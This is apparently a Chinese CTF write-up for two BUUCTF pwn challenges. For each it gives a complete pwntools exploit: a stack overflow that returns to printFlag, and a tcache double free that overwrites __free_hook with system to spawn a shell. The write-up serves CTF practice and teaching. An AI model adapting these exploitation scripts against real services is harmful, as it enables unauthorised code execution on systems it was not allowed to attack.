BUUCTF bbys_tu_2016&&xm_2019_awd_pwn2

在家希望武汉的师傅们一切都好~~

bbys_tu_2016

这道有点没搞清额额flag文件是flag.txt是能control但是好像不能ROP也是能读到flag文件的就很简单了还有似乎文件没写好setbuf函数不会先出现io流
exp:

#!/usr/bin/python2
from pwn import *
local=0
if local==1:
	p=process('../binary/bbys_tu_2016')
	elf=ELF('../binary/bbys_tu_2016')
else:
	p=remote('node3.buuoj.cn',25744)
	elf=ELF('../binary/bbys_tu_2016')
def exp():
	main=0x080485C9
	payload='a'*0x18+p32(elf.sym['printFlag'])
	p.sendline(payload)
	p.interactive()

if __name__=="__main__":
	exp()

xm_2019_awd_pwn2

直接tcache double free拿到free_hook甚至都不会检查size是否存在使得漏洞利用变得极为的简单打到free_hook写成system然后布置好chunk free拿到shell
exp:

#!/usr/bin/python2
from pwn import *
local=0
if local==1:
        p=process('./xm_2019_awd_pwn2')
        elf=ELF('./xm_2019_awd_pwn2')
        libc=elf.libc
else:
        p=remote('node3.buuoj.cn',25112)
        elf=ELF('./xm_2019_awd_pwn2')
        libc=elf.libc
def add(size,content):
        p.sendlineafter('>>','1')
        p.sendlineafter('size:',str(size))
        p.sendlineafter('content:',content)

def delete(idx):
        p.sendlineafter('>>','2')
        p.sendlineafter('idx:',str(idx))

def show(idx):
        p.sendlineafter('>>','3')
        p.sendlineafter('idx:',str(idx))
lg=lambda address,data:log.success('%s: '%(address)+hex(data))

def exp():
        add(0x500,'doudou') #0
        add(0x500,'douodu1') #1
        delete(0)
        show(0)
        libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['__malloc_hook']-0x10-96
        #lg('libcbase',libcbase)
        system=libcbase+libc.sym['system']
        free_hook=libcbase+libc.sym['__free_hook']
        add(0x60,'doudou1')#2
        add(0x60,'doudou2')#3
        delete(2)
        delete(2)
        add(0x60,p64(free_hook))
        add(0x60,'doudou3')#4
        add(0x60,p64(system))#5
        add(0x20,'/bin/sh\x00')#6
        lg('libcbase',libcbase)
        p.sendlineafter('>>','2')
        p.sendlineafter('idx:','7')
        p.interactive()
if __name__=="__main__":
        exp()